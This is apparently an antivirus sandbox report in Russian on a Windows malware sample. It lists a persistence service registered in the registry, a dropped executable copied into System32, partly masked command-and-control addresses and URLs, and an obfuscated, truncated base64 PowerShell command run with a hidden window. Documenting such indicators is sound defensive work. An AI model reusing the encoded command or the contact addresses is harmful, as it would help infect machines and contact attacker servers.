Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\tdh] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\tdh] 'ImagePath' = '"<SYSTEM32>\evr\tdh.exe"'
- 'tdh' "<SYSTEM32>\evr\tdh.exe"
- 'tdh' <SYSTEM32>\evr\tdh.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADcANAB5AGMAcgA3AD0AKAAnAEQAJwArACgAJwBrACcAKwAnAGgAbgAxACcAKQArACcAMgB1ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdABlAE0AUABcAFcATwByAEQAXAAyADAAMQA5AF...
- %TEMP%\word\2019\d11ong43.exe
- <SYSTEM32>\evr\tdh.exe
- %TEMP%\word\2019\d11ong43.exe в <SYSTEM32>\evr\tdh.exe
- '19#.#36.179.102':80
- '97.##7.135.148':8080
- http://ma##ue.es/stat/HWDzR/
- http://97.###.135.148:8080/WmLO690/2hNDZ/p5l08a5/2mlH20L6v3fUbR1ZzXf/CT9EUl/JiBiG1YHlct6VxOgLw/ via 97.##7.135.148
- DNS ASK ma##ue.es
- '%TEMP%\word\2019\d11ong43.exe'
- '<SYSTEM32>\evr\tdh.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABGADcANAB5AGMAcgA3AD0AKAAnAEQAJwArACgAJwBrACcAKwAnAGgAbgAxACcAKQArACcAMgB1ACcAKQA7ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdABlAE0AUABcAFcATwByAEQAXAAyADAAMQA5AF...' (со скрытым окном)